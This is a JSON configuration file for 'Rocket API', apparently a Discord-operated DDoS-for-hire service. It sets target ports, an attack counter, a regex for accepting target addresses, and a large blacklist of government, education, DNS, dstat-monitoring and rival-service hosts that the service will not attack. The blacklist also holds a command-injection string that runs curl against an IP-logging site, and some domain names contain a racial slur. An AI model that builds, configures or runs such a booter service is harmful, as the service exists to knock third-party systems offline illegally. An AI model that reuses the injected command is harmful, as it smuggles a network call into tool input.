{
    "webhook": {
        "webhook": "admin webhook",
        "footer": "Rocket API",
        "gif": "https://cat-archive.xyz/cat.gif",
        "colour": "#FF1919"
    },
    "bot": {
        "prefix": ".",
        "token": "discord token",
        "adminids": [
            "ur discord id"

        ],
        "footer": "Rocket API",
        "gif": "https://cat-archive.xyz/cat.gif",
        "colour": "#FF1919"
    },
    "ports": {
        "ports": [
            80,
            443
        ]
    },
    "api": {
        "apiname": [
            "Rocket API"
        ],
        "updates": [
            "v1.0.1"
        ]
    },
    "total": {
        "totalattacks": 825
    },
    "regex": {
        "ip": "([0-9]{1,3}\\.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}|http://[aA-zZ0-9]{1,500}.[aA-zZ0-9]{1,500}|https://[aA-zZ0-9]{1,500}.[aA-zZ0-9]{1,500})"
    },
    "blacklist": {
        "hosts": [
            "https://fbi.gov",
            "https://fbijobs.gov",
            "https://health.gov",
            "108.138.217.2",
            "108.138.217.73",
            "108.138.217.59",
            "108.138.217.99",
            "153.31.112.70",
            "https://webstress.xyz",
            "https://sensecdn.xyz",
            "1.1.1.1",
            "2.2.2.2",
            "3.3.3.3",
            "4.4.4.4",
            "5.5.5.5",
            "6.6.6.6",
            "7.7.7.7",
            "8.8.8.8",
            "9.9.9.9",
            "https://ufonline.ufl.edu/",
            "https://www.phoenix.edu",
            "https://www.rasmussen.edu/",
            "https://www.harvard.edu/",
            "https://www.educause.edu/",
            "https://askus.baker.edu/",
            "https://www.usg.edu/",
            "https://www.unt.edu/",
            "https://grad.illinois.edu/",
            "https://www.usa.gov/",
            "https://www.state.gov/",
            "https://www.benefits.gov/",
            "https://dhs.iowa.gov/",
            "https://www.iowa.gov/",
            "https://data.gov/",
            "23.227.146.106",
            "91.239.130.32",
            "50.7.239.226",
            "178.237.56.152",
            "52.144.47.155",
            "142.202.243.18",
            "100.21.12.60",
            "45.142.122.104",
            "185.244.166.150",
            "5.189.141.37",
            "207.154.245.145",
            "168.119.49.22",
            "135.181.45.33",
            "96.126.124.45",
            "77.247.178.7",
            "94.23.177.233",
            "37.59.91.23",
            "54.38.45.12",
            "51.77.74.130",
            "185.117.0.91",
            "108.61.210.201",
            "109.70.148.152",
            "mc.exitus.me",
            "http://38.27.122.110",
            "http://209.97.178.154",
            "https://176.9.16.251",
            "https://176.9.16.251",
            "http://88.198.8.149",
            "http://188.40.115.87",
            "http://85.10.195.175",
            "http://95.211.208.171",
            "http://78.31.67.223",
            "http://51.38.92.223",
            "http://77.223.102.17",
            "http://51.15.25.108",
            "http://108.61.96.28",
            "https://baloo.one",
            "https://s1ndwdrld.logicdn.com",
            "https://dstat.imagehub.host",
            "https://dev.exitus.me",
            "https://tls.mrrage.xyz",
            "https://flystress.net",
            "https://quantube.win",
            "https://dststx.xyz",
            "https://botflare.club",
            "https://beta.botflare.club/?q=%RAND%",
            "https://beta.exitus.me",
            "https://dd.exitus.me",
            "https://bytefend.xyz/?q=%RANDOM%",
            "https://tarnkappe.xyz?q=%RAND%",
            "https://flystress.net",
            "https://catstresser.fun",
            "https://webstress.xyz",
            "https://graph.brrsecurity.org",
            "https://dstat.cc/",
            "38.84.14.4",
            "23.227.131.170",
            "198.147.24.171",
            "212.102.40.198",
            "172.105.90.148",
            "23.227.134.122",
            "51.159.80.51",
            "51.159.80.53",
            "193.200.209.130",
            "178.237.56.152",
            "104.46.124.66",
            "149.81.80.151",
            "149.81.80.155",
            "109.70.148.223",
            "178.237.56.156",
            "108.165.235.20",
            "178.237.56.50",
            "108.165.234.159",
            "206.162.251.250",
            "185.44.73.12",
            "191.233.255.118",
            "172.105.111.130",
            "139.162.12.6",
            "176.58.105.179",
            "194.88.104.81",
            "162.55.101.231",
            "162.55.101.232",
            "185.121.172.11",
            "80.64.103.27",
            "23.227.146.106",
            "216.185.62.23",
            "192.165.82.183",
            "95.216.12.48",
            "148.251.238.46",
            "104.194.9.17",
            "51.89.211.29",
            "193.107.177.1",
            "8.26.94.147",
            "8.8.8.8",
            "51.83.67.106",
            "66.225.231.23",
            "66.151.138.234",
            "66.85.14.193",
            "91.239.130.11",
            "217.146.95.242",
            "35.220.240.192",
            "35.247.223.115",
            "192.223.28.17",
            "74.91.119.136",
            "66.85.14.193",
            "66.151.138.234",
            "64.94.100.200",
            "195.85.201.13",
            "cogentv2.dstat.org",
            "cogent.dstat.org",
            "contabo.dstat.org",
            "nforce.dstat.org",
            "cogentus.dstat.org",
            "novogara.dstat.org",
            "85.195.110.5",
            "85.195.107.199",
            "51.195.61.212",
            "62.221.250.224",
            "88.198.62.107",
            "144.91.80.251",
            "108.165.179.197",
            "202.84.39.45",
            "185.149.22.195",
            "198.251.83.26",
            "185.29.200.17",
            "157.245.3.38",
            "66.206.28.118",
            "49.169.94.5",
            "167.71.202.248",
            "165.22.254.223",
            "85.248.130.173",
            "193.33.186.37",
            "147.135.4.8",
            "223.27.85.98",
            "51.89.149.118",
            "178.32.129.26",
            "45.56.78.25",
            "23.94.229.168",
            "194.163.152.120",
            "85.195.107.218",
            "172.105.34.241",
            "3.8.217.228",
            "vShield.pro",
            "dstat.vShield.pro",
            "netamp.org",
            "srv1-netamp.xyz",
            "srv2-netamp.xyz",
            "srv3-netamp.xyz",
            "srv4-netamp.xyz",
            "https://netamp.org/",
            "https://graph.udp.solutions/",
            "https://www.pittville.gloucs.sch.uk/",
            "https://www.jefferson.kyschools.us/",
            "https://rocket-api.co/login.php",
            "https://apclassroom.collegeboard.org/",
            "https://www.tcp.xn--6frz82g/",
            "https://dststx.xyz",
            "beastiality.solutions",
            "https://rocket-api.co/login.php",
            "https://rocket-api.co/register.php",
            "https://rocket-api.co/hub.php",
            "https://rocket-api.co/purchase.php",
            "https://rocket-api.co/giftcards.php",
            "https://rocket-api.co/api.php",
            "5.63.10.6",
            "http://try-ddos.us/",
            "https://dukes.ncea.org.uk/",
            "https://ddos.hangniggers.com/",
            "https://dstat.imagehub.host",
            "https://www.tcp.xn--6frz82g/",
            "https://rocket-api.lol/hub.php",
            "https://rocket-api.lol/home.php",
            "https://rocket-api.lol/login.php",
            "https://rocket-api.lol/register.php",
            "https://rocket-api.lol/purchase.php",
            "https://rocket-api.lol/giftcards.php",
            "https://rocket-api.lol/api.php",
            "https://rocket-api.lol",
            "https://graph.sheesh.rip/",
            "http://51.79.50.46/",
            "https://fusionapi.dev/dashboard/main",
            "https://fusionapi.dev/",
            ";curl${IFS}https://iplogger.org/2j4Wq7%7D",
            "https://www.beaconhouse.net/",
            "https://stfranciscathedralschool.org/",
            "http://65.108.83.191/",
            "https://try-ddos.us/",
            "https://onlineislemler.turktelekom.com.tr/ios",
            "https://www.snapchat.com/",
            "https://wannabe1337.xyz/dstat/?19=1337",
            "https://15.204.128.29/",
            "https://fusionapi.dev",
            "https://rocket-api.space/login.php",
            "https://rocket-api.space/register.php",
            "https://rocket-api.space/home.php",
            "https://rocket-api.space/hub.php",
            "https://rocket-api.space/purchase.php",
            "https://rocket-api.space/giftcards.php",
            "https://rocket-api.space/api.php",
            "https://rocket-api.space/tos.php",
            "https://storm-hosting.digital/",
            "https://dstat-graph.com/layer7.php?server=1",
            "https://fusionapi.dev/dashboard/settings",
            "https://fusionapi.dev/login",
            "https://fusionapi.dev/register",
            "https://fusionapi.dev/reset",
            "https://fusionapi.dev/privacy",
            "https://fusionapi.dev/tos",
            "http://135.181.79.113/",
            "http://38.91.59.26:19999/#after=-540;before=0;=und",
            "http://38.84.14.4:19999/#;after=-540;before=0;them",
            "http://23.227.131.170:19999/#;after=-540;before=0;",
            "http://192.99.185.212:19999/#after=-540;before=0;=",
            "http://91.239.130.11:19999/#after=-540;before=0;=u",
            "http://89.187.181.130:19999/#after=-540;before=0;=",
            "http://135.181.79.113/hit",
            "http://85.10.195.175/hit",
            "http://50.7.198.146/hit",
            "http://51.15.25.208/hit",
            "http://51.159.30.249/hit",
            "http://109.71.9.87/hit",
            "http://49.51.35.158/hit",
            "http://46.166.142.81/hit",
            "http://35.221.231.4/hit",
            "http://69.162.108.171/hit",
            "http://91.232.174.39/hit",
            "https://ipstresser.xyz",
            "https://dstat.hackthatapi.com/",
            "https://dstat-graph.com/",
            "https://graph.sheesh.rip/",
            "https://graph.nekoshield.com/",
            "https://sensecdn.xyz/",
            "https://connectionfilter.xyz/dstat",
            "http://government.ru/",
            "https://gpm.nasa.gov/",
            "https://www.nasa.gov",
            "https://connectionfilter.xyz/"
        ]
    }
}